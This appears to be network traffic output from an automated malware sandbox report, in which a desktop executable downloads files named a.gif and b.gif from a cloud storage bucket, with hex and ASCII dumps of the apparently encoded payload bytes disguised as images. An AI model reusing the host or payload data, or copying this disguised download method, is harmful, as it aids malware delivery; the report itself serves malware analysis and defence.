                                                                            2025-01-15 08:02:24 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 46 59 55 5e 6d 36 70 31 42 42 1c 52 3c 7f 30 37 5e 5d 5e 59 3e 77 38 35 5c 4c 40 5b 38 28 75 38 57 55 17 59 77 3e 30 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 57 4b 4b 4f 3c 75 60 60 16 09 05 0e 3d 66 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 45 5a 56 5d 6e 35 73 32 41 41 1f 51 3f 7c 33 34 5d 5e 5d 5a 3d 74 3b 36 5f 4f 43 58 3b 2b 76 3b 54 56 14 58 76 3f 31 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 56 4a 4a 4e 3d 74 61 61 17 08 04 0f 3c 67 21
                                                                            Data Ascii: l%00FYU^m6p1BBR<07^]^Y>w85\L@[8(u8WUYw>0?????????????????????????????????WKKO<u``=f aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33EZV]n5s2AAQ?|34]^]Z=t;6_OCX;+v;TVXv?1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>VJJN=taa<g!


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.44973139.103.20.174437276C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:02:26 UTC105OUTGET /a.gif HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            User-Agent: Do
                                                                            Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                            2025-01-15 08:02:26 UTC545INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:02:26 GMT
                                                                            Content-Type: image/gif
                                                                            Content-Length: 135589
                                                                            Connection: close
                                                                            x-oss-request-id: 67876B92820F3F3537D1D3BF
                                                                            Accept-Ranges: bytes
                                                                            ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                                                            Last-Modified: Mon, 13 Jan 2025 12:21:20 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 8642451798640735006
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000104
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                                                            x-oss-server-time: 3
                                                                            2025-01-15 08:02:26 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                            Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                            2025-01-15 08:02:26 UTC4096INData Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87
                                                                            Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                                                            2025-01-15 08:02:26 UTC4096INData Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92
                                                                            Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                                                            2025-01-15 08:02:26 UTC4096INData Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                                                                            Data Ascii: c}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                                                            2025-01-15 08:02:26 UTC4096INData Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55
                                                                            Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
                                                                            2025-01-15 08:02:26 UTC4096INData Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92
                                                                            Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                                                            2025-01-15 08:02:26 UTC4096INData Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17
                                                                            Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                                                            2025-01-15 08:02:26 UTC4096INData Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58
                                                                            Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
                                                                            2025-01-15 08:02:26 UTC4096INData Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52
                                                                            Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJLR
                                                                            2025-01-15 08:02:26 UTC4096INData Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19
                                                                            Data Ascii: WUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.44973239.103.20.174437276C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:02:28 UTC105OUTGET /b.gif HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            User-Agent: Do
                                                                            Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                            2025-01-15 08:02:28 UTC547INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:02:28 GMT
                                                                            Content-Type: image/gif
                                                                            Content-Length: 125333
                                                                            Connection: close
                                                                            x-oss-request-id: 67876B9499F00D3432701CF0
                                                                            Accept-Ranges: bytes
                                                                            ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                                                            Last-Modified: Mon, 13 Jan 2025 12:21:19 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 10333201072197591521
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000104
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                                                            x-oss-server-time: 19
                                                                            2025-01-15 08:02:28 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                            Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                            2025-01-15 08:02:28 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                                                                            Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                                                            2025-01-15 08:02:28 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                                                                            Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                                                            2025-01-15 08:02:28 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                                                                            Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                                                            2025-01-15 08:02:28 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                                                                            Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                                                            2025-01-15 08:02:28 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                                                            Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                                                            2025-01-15 08:02:28 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                                                            Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
